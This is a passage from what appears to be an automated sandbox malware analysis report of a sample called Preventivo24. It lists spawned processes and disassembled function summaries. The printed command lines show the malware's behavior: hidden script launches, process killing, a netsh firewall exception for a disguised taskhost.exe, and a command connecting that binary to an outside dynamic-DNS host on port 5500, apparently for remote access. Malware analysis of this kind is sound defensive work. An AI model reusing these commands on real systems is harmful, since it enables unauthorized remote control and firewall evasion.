MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:18:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "taskhost.exe"
Imagebase:	0x9d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:18:08
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:18:08
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:18:08
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\mode.com
Wow64 process (32bit):	true
Commandline:	Mode 90,20
Imagebase:	0x900000
File size:	26'624 bytes
MD5 hash:	FB615848338231CEBC16E32A3035C3F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:18:09
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	12:18:10
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:18:10
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7640, Parent PID: 7876

General

Target ID:	26
Start time:	12:18:11
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: reg.exePID: 7804, Parent PID: 7640

General

Target ID:	27
Start time:	12:18:11
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xbc0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:18:13
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:18:15
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:18:16
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:18:16
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\mode.com
Wow64 process (32bit):	true
Commandline:	Mode 90,20
Imagebase:	0x900000
File size:	26'624 bytes
MD5 hash:	FB615848338231CEBC16E32A3035C3F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:18:16
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:18:16
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:18:17
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:18:17
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0xf10000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:18:17
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "taskhost.exe"
Imagebase:	0x9d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:18:18
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:18:18
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:18:19
Start date:	23/01/2024
Path:	C:\Games\taskhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Imagebase:	0xa0000
File size:	2'648'008 bytes
MD5 hash:	663FE548A57BBD487144EC8226A7A549
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Imagebase:	0x610000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8624, Parent PID: 8600

General

Target ID:	47
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	12:18:20
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 8724, Parent PID: 8608

General

Target ID:	50
Start time:	12:18:21
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: reg.exePID: 8740, Parent PID: 8724

General

Target ID:	51
Start time:	12:18:21
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xbc0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	12:18:40
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	12:19:00
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	12:19:20
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	12:19:41
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0xd30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.8%
Total number of Nodes:	943
Total number of Limit Nodes:	50

Executed Functions

Function 00FD3C50 Relevance: 49.8, APIs: 11, Strings: 17, Instructions: 819libraryloaderCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C), ref: 00FD3E90
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00FD3F7A
GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 00FD409F

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 00FD41A6

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 00FD42E1
SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D), ref: 00FD43C2
LoadLibraryW.KERNEL32(shfolder.dll), ref: 00FD4452
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00FD4492

Part of subcall function 00FC7E90: LoadLibraryW.KERNEL32(Shlwapi.dll,-00000001,00000000,?,?,?,?,?,?,?,?,00FD456B,?), ref: 00FC7EAF
Part of subcall function 00FC7E90: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00FC7EC5
Part of subcall function 00FC7E90: FreeLibrary.KERNEL32(00000000), ref: 00FC7F08

GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00FD46B0
SHGetPathFromIDListW.SHELL32(?,?), ref: 00FD4729
SHGetMalloc.SHELL32(00000000), ref: 00FD4742

Strings

WindowsVolume, xrefs: 00FD411F, 00FD4134, 00FD413E
APPDATA, xrefs: 00FD46A7, 00FD46AF
ProgramFilesFolder, xrefs: 00FD45D1
System32Folder, xrefs: 00FD3EEE, 00FD3F03, 00FD3F0D
SETUPEXEDIR, xrefs: 00FD428E
TempFolder, xrefs: 00FD41D2
AppDataFolder, xrefs: 00FD4617, 00FD4655
Shell32.dll, xrefs: 00FD458D
ProgramFiles, xrefs: 00FD4605
ProgramFiles64Folder, xrefs: 00FD3C88
SHGetFolderPathW, xrefs: 00FD448C
ProgramW6432, xrefs: 00FD3CE4
SystemFolder, xrefs: 00FD3DF1, 00FD3E06, 00FD3E10
shfolder.dll, xrefs: 00FD444D
PROGRAMFILES, xrefs: 00FD468D
Shlwapi.dll, xrefs: 00FD4561
WindowsFolder, xrefs: 00FD4013, 00FD4028, 00FD4032

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DirectoryLibrary$AddressFolderLoadPathProcWindows$EnvironmentFileFindFreeFromHeapListLocationMallocModuleNameProcessResourceSpecialSystemVariable
String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
API String ID: 2967964373-2261365735
Opcode ID: 9686efa25dcd9933a4419f86110cdfb15c0f1ca9403c88ff05ec8a7e624d1423
Instruction ID: 5cfe02054ea03b6d0a8a92a68d53a929a9c4472d88a0019a420439c422a10b87
Opcode Fuzzy Hash: 9686efa25dcd9933a4419f86110cdfb15c0f1ca9403c88ff05ec8a7e624d1423
Instruction Fuzzy Hash: F2621C319002198BDB28DF24CC55BB9B3B7FF55324F1841AAD816A7391DB32AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FD7CE0 Relevance: 36.4, APIs: 15, Strings: 5, Instructions: 1352libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

LoadLibraryExW.KERNEL32(00000000,00000000,00000001,010FB076,00000000,00000000,010FB076,00000000,?,?,010FB076,000000FF), ref: 00FD7E70

Strings

" ====, xrefs: 00FD7F6E
Advinst_, xrefs: 00FD8865, 00FD8877, 00FD8881
====== Starting logging of ", xrefs: 00FD7F2A, 00FD7F3C, 00FD7F46
Full command line:, xrefs: 00FD84D8
Command line to pass to MSI:, xrefs: 00FD858B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: HeapLibraryLoadProcess
String ID: ====== Starting logging of "$" ====$Advinst_$Command line to pass to MSI:$Full command line:
API String ID: 3872204244-3828228616
Opcode ID: 93869cbe23dc0b768d8546c3a5983fa29fda9f4a6a13e5ba20a4a2b18087ee2e
Instruction ID: d54ef68a5cdddeb4b2de312d0914ff354549e075352bb69fa5990fcb2605dda4
Opcode Fuzzy Hash: 93869cbe23dc0b768d8546c3a5983fa29fda9f4a6a13e5ba20a4a2b18087ee2e
Instruction Fuzzy Hash: EFB2C331A006098BDB18EF68C8557AEB7B6FF44320F18416EE915AB3D1DF349D06DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01002440 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 500
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(?,?), ref: 010024BB
GetLastError.KERNEL32 ref: 010024C5
GetUserNameW.ADVAPI32(?,?), ref: 0100250D
GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 01002547
GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 01002592
RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,B5580983), ref: 01002748
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,B5580983), ref: 01002778
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,B5580983,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 010028CF
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 01002908
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 01002942
RegDeleteKeyW.ADVAPI32(?,00000000), ref: 01002965
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 010029AA
RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 01002AAB
RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 01002AED

Strings

UserDomain, xrefs: 01002542, 0100258D
Software, xrefs: 01002798
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010029C9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Close$Delete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
API String ID: 1615433478-4079418357
Opcode ID: 1ffcf6bef1e60fc85d5db7e20b5b168ecceebe81599804e891c4fa27986c9367
Instruction ID: f5aaa008ba3a1b8c9e58cde9b08454a26cab90786ece1b2ae46cab6846b2b9eb
Opcode Fuzzy Hash: 1ffcf6bef1e60fc85d5db7e20b5b168ecceebe81599804e891c4fa27986c9367
